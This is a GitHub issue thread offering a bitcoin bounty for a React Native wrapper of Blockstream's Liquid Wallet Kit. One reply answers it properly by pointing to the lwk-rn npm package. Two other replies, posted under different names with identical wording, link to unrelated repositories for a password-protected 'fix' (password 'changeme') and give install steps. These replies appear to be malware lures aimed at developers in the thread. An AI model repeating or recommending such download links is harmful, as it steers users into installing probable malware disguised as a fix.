### ISSUE TITLE
Bounty for react-native package for blockstreams LWK- 0.03 BTC ($2000)

### ISSUE THREAD

**Issue by BlakeKaufman** [BlakeKaufman/BlitzWallet#4]
This bounty is for the conversion of Blockstream's LWK to a react-native package

Requirements:

Downloadable LWK that can be installed in a react-native environment with expo, and the Breez lightning SDK without breaking Breez SDK on both IOS and Android.

Background Context:

Blitz wallet currently uses this package: https://github.com/vulpemventures/react-native-gdk. However on IOS when this package is installed at the same time as the Breez Lighting SDK it breaks the SDK, see issue below 
https://github.com/vulpemventures/react-native-gdk/issues/3. Since liquid is foundational to Blitz Wallets functionality a react-native liquid wallet kit is crucial.

All the current liquid code we have to show current usage: https://github.com/BlakeKaufman/BlitzWallet/blob/main/app/functions/liquidWallet/index.js

Helpfull links:
Android Bindings: https://github.com/Blockstream/lwk/tree/master/lwk_bindings
Swift Bindings: https://github.com/Blockstream/lwk-swift

Bounty:
0.03 BTC ($2000)

Funding: blitz-wallet.com

Your work will be helping to onboard more users to Bitcoin.

To claim the bounty, reply to this issue with a link to an NPM package that can be downloaded. Packages will be evaluated on a first come first serve basis, and the bounty will be allocated after review and confirmation that code quality is sufficient and functional.

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lvaccaro** [comment]
Hello @BlakeKaufman ,
you could install [lwk-rn](https://www.npmjs.com/package/lwk-rn) to start using lwk bindings into a react native app.
```sh 
npm install lwk-rn
```

References:
- repo: https://github.com/lvaccaro/lwk-rn
- npm: https://www.npmjs.com/package/lwk-rn

Based on:
- LWK: https://github.com/blockstream/lwk
- LWK-swift: https://github.com/blockstream/lwk-swift

Depends on:
- lwk android github package: lwk_bindings at https://github.com/orgs/Blockstream/packages?repo_name=lwk
- lwk cocoapods package: LiquidWalletKit & lwkFFI

Added a brief introduction on writing react native module at https://github.com/lvaccaro/lwk-rn/blob/main/HOW-TO.md . The library will support all functions and features exposed by LWK bindings. Need some extra time for feature parity. All feedbacks are welcome.

I hope [lwk-rn](https://github.com/lvaccaro/lwk-rn) could be a milestone for your architecture and for future developments. 

Thanks to all Blockstream LWK team for the amazing library and a special thanks to @rcasatta to help me about packaging library for iOS and Android.
